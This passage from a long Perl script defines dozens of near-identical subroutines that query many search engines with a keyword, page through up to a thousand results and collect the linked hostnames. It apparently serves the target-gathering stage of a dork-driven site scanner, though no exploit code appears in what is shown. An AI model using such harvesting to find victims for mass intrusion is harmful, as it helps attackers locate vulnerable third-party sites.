  2258.         my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
  2259.         my $res = &search_engine_query($search);
  2260.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2261.             if ($1 !~ /rediff\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2262.                         }
  2263.         }
  2264.     }
  2265.     return @list;
  2266. }
  2267. ############### GOED
  2268. sub mamma(){
  2269.         my @list;
  2270.         my $key = $_[0];
  2271.         for($b=0;$b<=1000;$b+=100){
  2272.                 my $Th=("http://www.mamma.com/result.php?q=".key($key)."&type=web&p=".$b);
  2273.                 my $Res=&search_engine_query($Th);
  2274.                 while($Res =~ m/target=\"_blank\">(.+?)\//g){
  2275.                         if ($1 !~ /msn|live|google|yahoo/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2276.                         }
  2277.                 }
  2278.         }
  2279. return @list;
  2280. }
  2281. #### -
  2282. sub uol() {
  2283.     my @list;
  2284.     my $key = $_[0];
  2285.     for (my $i=1; $i<=1000; $i+=100) {
  2286.         my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);
  2287.         my $res = &search_engine_query($search);
  2288.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2289.             my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2290.         }
  2291.     }
  2292.     return @list;
  2293. }
  2294. ############### GOED
  2295. sub bing() {
  2296.     my @list;
  2297.     my $key = $_[0];
  2298.     for (my $i=1; $i<=1000; $i+=100) {
  2299.         my $search = ("http://www.bing.com/search?q=".&key($key)."&first=".$i."&FORM=PERE");
  2300.         my $res = &search_engine_query($search);
  2301.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2302.             if ($1 !~ /bing\.com/) { my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2303.             }
  2304.         }
  2305.     }
  2306.     return @list;
  2307. }
  2308. ############### GOED
  2309. sub altavista() {
  2310.     my @list;
  2311.     my $key = $_[0];
  2312.     for (my $i=1; $i<=1000; $i+=100){
  2313.         my $search = ("http://search.yahoo.com/search?n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=".$i."&vf=all&vm=p&fl=0&fr=altavista&p=".&key($key)."&vs=");
  2314.         my $res = &search_engine_query($search);
  2315.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2316.             if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2317.             }
  2318.         }
  2319.     }
  2320.     return @list;
  2321. }
  2322. ############### GOED
  2323. sub ask() {
  2324.     my @list;
  2325.     my $key = $_[0];
  2326.     for (my $i=1; $i<=1000; $i+=100) {
  2327.         my $search = ("http://uk.ask.com/web?q=".&key($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  2328.         my $res = &search_engine_query($search);
  2329.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2330.             if ($1 !~ /ask\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2331.             }
  2332.         }
  2333.     }
  2334.     return @list;
  2335. }
  2336. ############### GOED
  2337. sub yahoo(){
  2338.     my @list;
  2339.         my $key = $_[0];
  2340.     my $b   = 0;
  2341.         for ($b=1; $b<=1000; $b+=100) {
  2342.         my $search = ("http://search.yahoo.com/search?n=100&p=".&key($key)."&b=".$b);
  2343.         my $res = &search_engine_query($search);
  2344.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2345.             if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2346.             }
  2347.         }
  2348.     }
  2349.     return @list;
  2350. }
  2351. ############### GOED
  2352. sub yahoo2() {
  2353.   my @list;
  2354.   my $key = $_[0];
  2355.   my $b   = 0;
  2356.   my @doms = ("at","au","br","ca","de","es","fr","it","uk");
  2357.   foreach my $domain (@doms) { #$dom = $doms[rand(scalar(@doms))];
  2358.     for (my $i=1; $i<=1000; $i+=100) {
  2359.         my $search = ("http://".$domain.".search.yahoo.com/search?n=100&p=".&key($key)."&b=".$i);
  2360.         my $res = &search_engine_query($search);
  2361.         while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2362.             if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2363.             }
  2364.         }
  2365.     } return @list;
  2366. }
  2367. }
  2368. ############### GOED
  2369. sub clusty() {
  2370.     my @list;
  2371.         my $key = $_[0];
  2372.     my $b   = 0;
  2373.         for ($b=10; $b<=1000; $b+=100) {
  2374.         my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
  2375.         my $res = &search_engine_query($search);
  2376.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2377.             if ($1 !~ /yippy\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2378.             }
  2379.         }
  2380.     }
  2381.     return @list;
  2382. }
  2383. #### +
  2384. sub gutser() {
  2385.     my @list;
  2386.     my $key = $_[0];
  2387.     for ($b=1; $b<=1000; $b+=100) {
  2388.         my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0");
  2389.         my $res = &search_engine_query($search);
  2390.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2391.             if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2392.             }
  2393.         }
  2394.     }
  2395.     return @list;
  2396. }
  2397. #### -
  2398. sub exalead() {
  2399.   my @list;
  2400.   my $key = $_[0];
  2401.     for ($b=0; $b<=1000; $b+=100) {
  2402.         my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);
  2403.         my $res = &search_engine_query($search);
  2404.         while ($res =~ m/http\/\/(.+?)\//g) {
  2405.             my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2406.             }
  2407.         }
  2408.     return @list;      
  2409. }      
  2410. ############### GOED
  2411. sub lycos() {
  2412.   my @list;
  2413.   my $key = $_[0];
  2414.     for ($b=0; $b<=1000; $b+=100) {
  2415.         my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
  2416.         my $res = &search_engine_query($search);
  2417.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2418.             if ($1 !~ /lycos\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2419.             }
  2420.         }
  2421.     }
  2422.     return @list;      
  2423. }      
  2424. ############### GOED
  2425. sub virgilio() {
  2426.   my @list;
  2427.   my $key = $_[0];
  2428.     for ($b=10; $b<=1000; $b+=100) {
  2429.         my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=100&offset=".$b);
  2430.         my $res = &search_engine_query($search);
  2431.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2432.             if ($1 !~ /\.virgilio\.it/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2433.             }
  2434.         }
  2435.     }
  2436.     return @list;      
  2437. }      
  2438. #### +
  2439. sub webde() {
  2440.   my @list;
  2441.   my $key = $_[0];
  2442.     for ($b=1; $b<=1000; $b+=100) {
  2443.         my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&key($key)."&search=Suche");
  2444.         my $res = &search_engine_query($search);
  2445.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2446.             my $link = $1; if ($link!~ /suche|web/){ $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2447.             }
  2448.         }
  2449.     }
  2450.     return @list;      
  2451. }
  2452. #### -
  2453. sub hotbot() {
  2454.   my @list;
  2455.   my $key = $_[0];
  2456.     for ($b=0; $b<=1000; $b+=100) {
  2457.         my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
  2458.         my $res = &search_engine_query($search);
  2459.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2460.             if ($1 !~ /hotbot/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2461.             }
  2462.         }
  2463.     }
  2464.     return @list;      
  2465. }
  2466. #### + 
  2467. sub aol() {
  2468.   my @list;
  2469.   my $key = $_[0];
  2470.     for ($b=2; $b<=1000; $b+=100) {
  2471.         my $search = ("http://aim.search.aol.com/aol/search?q=".&key($key)."&page=".$b);
  2472.         my $res = &search_engine_query($search);
  2473.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2474.             if ($1 !~ /aol/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2475.             }
  2476.         }
  2477.     }
  2478.     return @list;      
  2479. }
  2480. #### +
  2481. sub sapo(){
  2482.     my @list;
  2483.         my $key = $_[0];
  2484.         for ($b=1; $b<=1000; $b+=100) {
  2485.         my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=100&location=pt&page=".$b."&q=".&key($key)."&st=local");
  2486.         my $res = &search_engine_query($search);
  2487.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2488.             if ($1 !~ /sapo/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2489.             }
  2490.         }
  2491.     }
  2492.     return @list;
  2493. }
  2494. ############### GOED
  2495. sub duck() {
  2496.         my @list;
  2497.         my $key = $_[0];
  2498.     my $b   = 0;
  2499.         for ($b=1; $b<=1000; $b+=100) {
  2500.         my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&l=us-en&p=".$b."&s=100&o=json&dc=54&api=d.js");
  2501.         my $res = &search_engine_query($search);
  2502.         while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\//g) {
  2503.             if ($1 !~ /duckduckgo/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2504.             }
  2505.         }
  2506.     }
  2507.     return @list;
  2508. }
  2509. #### -
  2510. sub yause() {
  2511.         my @list;
  2512.         my $key = $_[0];
  2513.     my $b   = 0;
  2514.         for ($b=1; $b<=1000; $b+=100) {
  2515.         my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
  2516.         my $res = &search_engine_query($search);
  2517.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2518.             if ($1 !~ /yauba\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2519.             }
  2520.         }
  2521.     }
  2522.     return @list;
  2523. }
  2524. ############### GOED
  2525. sub baidu() {
  2526.         my @list;
  2527.         my $key = $_[0];
  2528.     my $b   = 0;
  2529.         for ($b=0; $b<=1000; $b+=100) {
  2530.         my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
  2531.         my $res = &search_engine_query($search);
  2532.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2533.             if ($1 !~ /baidu\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2534.             }
  2535.         }
  2536.     }
  2537.     return @list;
  2538. }
  2539. ############### GOED
  2540. sub black() {
  2541.         my @list;
  2542.         my $key = $_[0];
  2543.     my $b   = 0;
  2544.         for ($b=0; $b<=1000; $b+=100) {
  2545.         my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
  2546.         my $res = &search_engine_query($search);
  2547.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2548.             if ($1 !~ /blekko/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2549.             }
  2550.         }
  2551.     }
  2552.     return @list;
  2553. }
  2554. ############### GOED
  2555. sub onet() {
  2556.         my @list;
  2557.         my $key = $_[0];
  2558.     my $b   = 0;
  2559.         for ($b=1; $b<=1000; $b+=100) {
  2560.         my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
  2561.         my $res = &search_engine_query($search);
  2562.         while ($res =~ m/<a href=\"http:\/\/(.+?)\//g) {
  2563.             if ($1 !~ /webcache|query/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2564.             }
  2565.         }
  2566.     }
  2567.     return @list;
  2568. }
  2569. ############### GOED
  2570. sub sizuka() {
  2571.         my @list;
  2572.         my $key = $_[0];
  2573.     my $b   = 0;
  2574.         for ($b=10; $b<=1000; $b+=100) {
  2575.         my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
  2576.         my $res = &search_engine_query($search);
  2577.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2578.             if ($1 !~ /szukacz/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2579.             }
  2580.         }
  2581.     }
  2582.     return @list;
  2583. }
  2584. #### -
  2585. sub walla() {
  2586.         my @list;
  2587.         my $key = $_[0];
  2588.     my $b   = 0;
  2589.         for ($b=0; $b<=1000; $b+=100) {
  2590.         my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);
  2591.         my $res = &search_engine_query($search);
  2592.         while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
  2593.             if ($1 !~ /walla\.co\.il/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2594.             }
  2595.         }
  2596.     }
  2597.     return @list;
  2598. }
  2599. #### -
  2600. sub demos() {
  2601.         my @list;
  2602.         my $key = $_[0];
  2603.     my $b   = 0;
  2604.         for ($b=0; $b<=1000; $b+=100) {
  2605.         my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
  2606.         my $res = &search_engine_query($search);
  2607.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2608.             if ($1 !~ /search|dmoz/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2609.             }
  2610.         }
  2611.     }
  2612.     return @list;
  2613. }
  2614. #### -
  2615. sub rose() {
  2616.   my @list;
  2617.   my $key = $_[0];
  2618.   my $b   = 0;
  2619.   my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
  2620.         foreach my $language (